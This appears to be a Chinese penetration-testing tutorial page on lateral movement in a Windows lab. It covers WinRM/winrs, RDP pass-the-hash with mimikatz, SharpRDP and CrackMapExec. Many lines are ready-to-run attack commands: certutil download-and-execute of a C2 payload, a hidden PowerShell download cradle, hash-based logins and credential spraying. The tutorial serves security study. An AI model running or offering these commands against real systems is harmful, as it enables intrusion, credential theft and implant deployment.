当前位置: 首页 > news >正文

第180天:横向移动篇入口切换SMB共享WMI管道DCOM组件Impacket套件CS插件

横向移动主要是基于以下三块内容
基于口令
ipc smb wi dcom winrs winrm rdp等
pth ptt ptk

基于漏洞
域控提取漏洞 Exchange漏洞攻防

基于配置
委派 dysnc asrep kerberos攻击 ntlmreply

wimrn

WinRM代表Windows远程管理,是一种允许管理员远程执行系统管理任务的服务。WinRS是内置的命令行工具,用于远程连接运行WinRM的服务器并执行大多数cmd命令
参考:https://cloud.tencent.com/developer/article/1802241
利用条件:
1、win 2012之前利用需要手动开启winRM ,在win 2012之后(包括win 2012)的版本是默认开启的,
2、防火墙对5986、5985端口开放。
开启命令:

winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}

1.探针可用:
端口扫描5985
2.连接执行:通过winrs来执行远程命令

shell winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami
shell winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami

3.上线C2:

shell winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"

4.CS内置:

winrm winrm64
image

5.其他解决:通过winrm.cmd来进行命令执行 (前几种的方式可能会报错啥的)

shell winrm invoke Create wmicimv2/win32_process @{CommandLine="cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"} -r:sqlserver -u:sqlserver\administrator -p:admin!@#45

端口5985

RDP横向移动

远程桌面服务 支持明文及HASH连接 端口3389
条件:对方开启RDP服务 远程桌面
rdp通过mimikatz,进行把hash值传到被控机,然后用被控机进行横向移动(需要获得被控机的图形化控制页面),但是连接的时候还远程的电脑还需要支持受限管理模式,
image

mimikatz(HASH连接)

mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin"

SharpRDP(明文连接)

https://github.com/0xthirteen/SharpRDP
是一款可以不借助远程桌面GUI的情况下,通过RDP协议进行命令执行的程序。

SharpRDP.exe computername=192.168.3.32 command="powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.3.31:83/a'))\"" username=Administrator password=admin!@#45

image

CrackMapExec

内网喷洒非常重要的一款工具
CME
Github:https://github.com/Porchetta-Industries/CrackMapExec
官方手册:https://www.crackmapexec.wiki/
使用案例:https://www.cnblogs.com/Yang34/p/14411497.html
kali自带,需要配置proxychains4.conf
主要需要注意本地登录和域内登录 以及可以指定域
--local-auth 本地

proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c #域用户HASH登录
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45' --local-auth #本地用户明文登录
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p 'admin!@#45' --local-auth -x "whoami" #本地用户明文登录并执行命令
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth #本地用户HASH登录
proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"
proxychains4 crackmapexec smb 192.168.3.21-32 -u administrator -p pass.txt --local-auth -x "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4444.exe 4444.exe & 4444.exe"
proxychains4 crackmapexec smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c --local-auth --users
http://www.jsqmd.com/news/31269/

相关文章:

  • 2025年11月沼气直燃品牌/品牌排名前十:技术实力对比与总结
  • 高效学习方式——知识关联性
  • 基于时间的ACL - 教程
  • 2025年云南做楼体灯光亮化服务商权威推荐榜单:云南做酒店灯光亮化/云南做居民楼灯光亮化/云南做写字楼灯光亮化服务商精选
  • 信息系统方案的范围管理(12345智慧政务)
  • [Python刷题记录]-三数之和-双指针-中等
  • Serilog日志库简单实践(一):控制台与调试Sinks(.NET 8)汇报总结
  • WPF实现组件拖动(Canvas)
  • 2025 年最新测控终端厂家推荐:符合国标 + 数据透传技术,靠谱企业深度测评报告4G 测控终端/远程测控终端/物联网测控终端/测控终端 RTU 公司推荐
  • 使用Node.js开发MCP服务器入门总结
  • 2025年菊花种苗生产厂家权威推荐榜单:菊花造型/菊花花坛/菊花种苗基地源头厂家精选
  • 2025年低噪音冷却塔实力厂家权威推荐榜单:工业冷却塔/防腐蚀冷却塔/冷却塔填料源头厂家精选
  • React系列教程:2. 定义一个组件
  • go语言获取腾讯股票示例
  • 质数筛
  • 2025年11月低氮燃烧器品牌前十排名:权威评测与行业洞察
  • React系列教程:3. 管理状态
  • 2025年外墙保温装饰一体板厂家推荐:浙江欣阳嘉茂控股集团,保温装饰一体板/保温装饰板/金属保温装饰一体板/薄陶瓷保温装饰一体板/多品类适配建筑需求
  • 如何申请和设置400电话系统?
  • 传图取字小程序:高效 OCR 文字识别工具,轻松实现图片转文字
  • 2025年11月火焰检测供应商Top10权威推荐榜:海德测控居首
  • 如何优化智能客服平台的服务流程?技巧分享!
  • Grafana12安装部署
  • 11.4联考总结
  • 维语视频微信小程序系统:一站式视频服务解决方案
  • 2025年11月火焰检测厂家推荐TOP10榜单:优质选择指南
  • 20251104
  • 图的dfs和bfs遍历
  • 永久配置 Gradle 输出编码(彻底解决)
  • 2025年热风炉品厂家/工厂排名前十:徐州海德测热风炉领跑行业